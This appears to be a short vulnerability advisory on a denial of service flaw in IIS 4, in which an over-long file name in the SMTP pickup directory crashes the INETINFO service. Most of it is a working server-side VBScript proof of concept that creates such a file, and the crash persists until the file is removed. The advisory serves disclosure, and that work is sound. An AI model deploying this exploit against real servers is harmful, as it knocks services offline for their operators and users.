IIS 4 Denial of Service

It is possible to cause a denial of service condition against IIS by manipulating file names within the SMTP service"s directory structure. By creating a file name of more than 85 characters in length within the "\mailroot\pickup" directory, the mail server will generate an error and crash the INETINFO service, which supports IIS.

In addition, as long as the file remains in place IIS cannot start up properly. To restore service the file must be removed.

DEMONSTRATION

This demonstration code runs on the server side, which means you need a means to get the code on the server to begin with. This may imply a rather low risk since its hard to get foreign code on to a remote server, but consider a scenario that involves an ISP that  routinely allows ASP code to be installed on private sites.

<script>
" PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"

Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
  Thefile.writeline "X-Sender: [email protected]"
  Thefile.writeline "X-Receiver: [email protected]"
  Thefile.writeline "From: <[email protected]>"
  Thefile.writeline "To: <[email protected]>"
  Thefile.writeline "Subject: MINE DID NOT CRASH"
  Thefile.writeline "Date: " & now()
  Thefile.writeline "X-Generator: " & Thename
  Thefile.close
Set thefile = nothing
  Thename = ""

Function Createkey
for z = 1 to 80
   randomize
   a = Int((25 * Rnd) + 1)
   password = password & chr(a+65)
next
Createkey = password
end function
</script>

VENDOR RESPONSE

CREDITS
Discovered by valentijn